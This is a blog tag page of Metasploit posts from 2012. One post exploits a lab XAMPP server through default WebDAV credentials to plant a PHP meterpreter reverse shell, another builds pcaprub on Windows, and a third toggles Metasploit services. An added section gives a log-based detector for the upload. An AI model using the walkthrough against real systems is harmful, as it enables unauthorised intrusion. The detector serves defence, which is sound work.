Posts Tagged ‘Metasploit’

Exploit XAMPP With Metasploit Framework

June 29, 2012 1 comment

XAMPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

This is the distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

[Image: XAMPP For Windows]

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use the XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf > use exploit/windows/http/xampp_webdav_upload_php
msf  exploit(xampp_webdav_upload_php) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf  exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

[Image: Xampp Exploit]

We’re home.
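From the defender's side, this attack leaves a clear trace in Apache's access.log on the XAMPP host: an authenticated PUT of a .php file into /webdav/ followed by a GET of that same file (the payload being executed). The detector below is an added example, not part of the original post; the log lines are constructed and the random payload filename is an assumption.

```python
import re
from collections import namedtuple

# Apache "combined" log format, which is what XAMPP's access.log uses.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Extensions a stock XAMPP install hands to mod_php.
PHP_EXT = ('.php', '.php3', '.php4', '.php5', '.phtml')

Alert = namedtuple('Alert', 'kind ip user path status')

def parse(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect_webdav_php_upload(lines, dav_prefix='/webdav/'):
    """Flag successful PUTs of PHP files into the WebDAV share, then any later
    GET of the same path (the uploaded payload being run). Only PUT is
    checked: MOVE/COPY carry the target name in a Destination header that
    the access log does not record."""
    alerts, uploaded = [], set()
    for line in lines:
        r = parse(line)
        if not r or not r['path'].startswith(dav_prefix):
            continue
        path = r['path'].split('?', 1)[0].lower()
        ok = r['status'].startswith('2')          # 201 Created / 204 on overwrite
        if r['method'] == 'PUT' and ok and path.endswith(PHP_EXT):
            uploaded.add(path)
            alerts.append(Alert('php_upload', r['ip'], r['user'], r['path'], r['status']))
        elif r['method'] == 'GET' and ok and path in uploaded:
            alerts.append(Alert('php_exec', r['ip'], r['user'], r['path'], r['status']))
    return alerts

# Constructed sample: the module's upload + execution, one benign PUT, one rejected PUT.
SAMPLE_LOG = [
    '192.168.244.128 - wampp [29/Jun/2012:11:55:01 -0400] "PUT /webdav/AbCdEf.php HTTP/1.1" 201 0 "-" "-"',
    '192.168.244.128 - - [29/Jun/2012:11:55:02 -0400] "GET /webdav/AbCdEf.php HTTP/1.1" 200 0 "-" "-"',
    '10.0.0.5 - wampp [29/Jun/2012:11:57:00 -0400] "PUT /webdav/notes.txt HTTP/1.1" 201 0 "-" "-"',
    '10.0.0.9 - - [29/Jun/2012:11:58:00 -0400] "PUT /webdav/x.php HTTP/1.1" 401 401 "-" "-"',
]

if __name__ == '__main__':
    for alert in detect_webdav_php_upload(SAMPLE_LOG):
        print(alert)
```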

Metasploit – How to install Pcaprub for Windows

May 31, 2012 1 comment

While using the Metasploit 3 console and trying to use the auxiliary ipidseq scanner module, I got the following error message:

The Pcaprub module is not available: no such file to load — pcaprub
[-] Auxiliary failed: RuntimeError Pcaprub not available
[-] Call stack:

How to install Pcaprub for Windows (Windows 7):

  • Install the latest msf3, either through the installer or (Tortoise) SVN; the Ruby shipped with the msf3 installer will not be used for this test
  • Update msf3 to at least version – (svn update)
  • Unzip the WinPcap Developer's Pack to c:\ so that you have C:\WpdPack\Include, C:\WpdPack\Lib, ….
  • Copy the RubyInstaller DevKit archive to c:\devkit and extract it there
  • Launch a command prompt and cd c:\devkit
  • Run devkitvars.bat
  • ruby dk.rb init
  • ruby dk.rb install
  • cd …../msf3/external/pcaprub
  • ruby extconf.rb
  • make
  • make install
  • ruby test_pcaprub.rb
  • Copy c:\Ruby193\lib\ruby\site_ruby\1.9.1\i386-msvcrt\pcaprub.so to c:\Program Files (x86)\Rapid7\framework\ruby\lib\ruby\site_ruby\1.9.1\i386-msvcrt\

Microsoft Windows [Wersja 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation. Wszelkie prawa zastrzeżone.

c:\devkit>dir
 Wolumin w stacji C nie ma etykiety.
 Numer seryjny woluminu: FE45-9B53

Katalog: c:\devkit
 c:\devkit>dir *.bat
 Wolumin w stacji C nie ma etykiety.
 Numer seryjny woluminu: FE45-9B53

Katalog: c:\devkit

2010-12-14  21:00               297 devkitvars.bat
 2010-09-29  01:48             7 167 msys.bat
 2 plik(ów)              7 464 bajtów
 0 katalog(ów)  93 853 249 536 bajtów wolnych

c:\devkit>devkitvars.bat
 Adding the DevKit to PATH...

c:\devkit>ruby dk.rb init
 [INFO] found RubyInstaller v1.9.3 at C:/Ruby193

Initialization complete! Please review and modify the auto-generated
 'config.yml' file to ensure it contains the root directories to all
 of the installed Rubies you want enhanced by the DevKit.

c:\devkit>ruby dk.rb install
 [INFO] Updating convenience notice gem override for 'C:/Ruby193'
 [INFO] Installing 'C:/Ruby193/lib/ruby/site_ruby/devkit.rb'

c:\devkit>cd c:\programs files (x86)
 System nie może odnaleźć określonej ścieżki.

c:\devkit>cd ..

c:\>cd Programs Files (x86)
 System nie może odnaleźć określonej ścieżki.

c:\>cd Program Files (x86)

c:\Program Files (x86)>cd Rapid7

c:\Program Files (x86)\Rapid7>cd framework

c:\Program Files (x86)\Rapid7\framework>cd msf3

c:\Program Files (x86)\Rapid7\framework\msf3>cd external

c:\Program Files (x86)\Rapid7\framework\msf3\external>cd pcaprub

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>ruby extconf.rb
 platform is i386-mingw32

[*] Running checks for netifaces code added by metasploit project
 -----------------------------------------------------------------
 checking for main() in -lws2_32... yes
 checking for main() in -liphlpapi... yes
 checking for windows.h... yes
 checking for winsock2.h... yes
 checking for iphlpapi.h... yes

[*] Running checks for pcap code...
 -----------------------------------
 checking for pcap_open_live() in -lwpcap... yes
 checking for pcap_setnonblock() in -lwpcap... yes
 creating Makefile

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>make
 generating pcaprub-i386-mingw32.def
 compiling netifaces.c
 netifaces.c: In function 'add_to_family':
 netifaces.c:194:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c: In function 'rbnetifaces_s_addresses':
 netifaces.c:213:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:218:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:261:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:266:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:279:4: warning: ISO C90 forbids mixed declarations and code
 netifaces.c: In function 'rbnetifaces_s_interfaces':
 netifaces.c:545:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:588:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:590:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c: In function 'rbnetifaces_s_interface_info':
 netifaces.c:753:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:763:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:775:3: warning: ISO C90 forbids mixed declarations and code
 compiling pcaprub.c
 In file included from C:/WpdPack/include/pcap/pcap.h:41:0,
                  from C:/WpdPack/include/pcap.h:45,
                  from pcaprub.c:9:
 C:/WpdPack/include/pcap-stdinc.h:64:0: warning: "snprintf" redefined
 c:/Ruby193/include/ruby-1.9.1/ruby/subst.h:6:0: note: this is the location of the previous definition
 C:/WpdPack/include/pcap-stdinc.h:65:0: warning: "vsnprintf" redefined
 c:/Ruby193/include/ruby-1.9.1/ruby/subst.h:7:0: note: this is the location of the previous definition
 linking shared-object pcaprub.so

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>make install
 /usr/bin/install -c -m 0755 pcaprub.so C:/Ruby193/lib/ruby/site_ruby/1.9.1/i386-msvcrt
 installing default pcaprub libraries

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>ruby test_pcaprub.rb
 Run options:

# Running tests:

Pcaprub default device: \Device\NPF_{FC3FE7B3-21B1-410F-AAFD-57F5E62EFDB3}
 .Pcaprub net (\Device\NPF_{FC3FE7B3-21B1-410F-AAFD-57F5E62EFDB3}): 192.168.0.0 ffffff00
 .AF_LINK Value is -1000
 AF_INET Value is 2
 AF_INET6 Value is 23
 .\Device\NPF_{14ED440E-E5BE-4290-852A-073A7BD7E251} :
 -1000 :
 addr : 22:24:2c:0b:07:33

2 :
 addr : 0.0.0.0
 netmask : 0.0.0.0
 broadcast : 255.255.255.255

\Device\NPF_{271276FF-FBEE-4113-98FA-BF770EB76C38} :
 -1000 :
 addr : 00:23:8b:9b:d9:4b

2 :
 addr : 0.0.0.0
 netmask : 0.0.0.0
 broadcast : 255.255.255.255

\Device\NPF_{4AB0E7A8-ED96-40C8-9F7E-D78933F02405} :
 -1000 :
 addr : 00:50:56:c0:00:01

2 :
 addr : 192.168.64.1
 netmask : 255.255.255.0
 broadcast : 192.168.64.255

\Device\NPF_{9B1AD6F8-0BD9-4EE0-A2EC-64403CB51B4A} :
 -1000 :
 addr : 00:50:56:c0:00:08

2 :
 addr : 192.168.180.1
 netmask : 255.255.255.0
 broadcast : 192.168.180.255

\Device\NPF_{B8CD3325-6221-4AFC-A3EB-B1BD363D3BE2} :
 -1000 :
 addr : 00:24:2c:0b:07:33

2 :
 addr : 0.0.0.0
 netmask : 0.0.0.0
 broadcast : 255.255.255.255

\Device\NPF_{F65076A9-A7F1-4357-A08A-804E694187DC} :
 -1000 :
 addr : 08:00:27:00:c4:35

2 :
 addr : 192.168.56.1
 netmask : 255.255.255.0
 broadcast : 192.168.56.255

\Device\NPF_{FC3FE7B3-21B1-410F-AAFD-57F5E62EFDB3} :
 -1000 :
 addr : 80:00:60:0f:e8:00

2 :
 addr : 192.168.0.102
 netmask : 255.255.255.0
 broadcast : 192.168.0.255

....E....Pcaprub version: 0.9-dev
 .

Finished tests in 7.899207s, 1.6457 tests/s, 1.2659 assertions/s.

1) Error:
 test_pcap_next(Pcap::UnitTest):
 Errno::EBADF: Bad file descriptor
 test_pcaprub.rb:93:in `each'
 test_pcaprub.rb:93:in `block in test_pcap_next'

13 tests, 10 assertions, 0 failures, 1 errors, 0 skips

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>

Categories: Metasploit

Disable Metasploit / Enable Metasploit in Windows

March 20, 2012 Add a comment

Disable (stop) script:

 net stop "Metasploit Pro Service"
 net stop "Metasploit Thin Service"
 net stop metasploitPostgreSQL
 sc config metasploitProSvc   start= disabled
 sc config metasploitThin  start= disabled
 sc config metasploitPostgreSQL  start= disabled

Enable (start) script:

 sc config metasploitProSvc   start= auto
 sc config metasploitThin  start= auto
 sc config metasploitPostgreSQL  start= auto
 net start "Metasploit Pro Service"
 net start "Metasploit Thin Service"
 net start metasploitPostgreSQL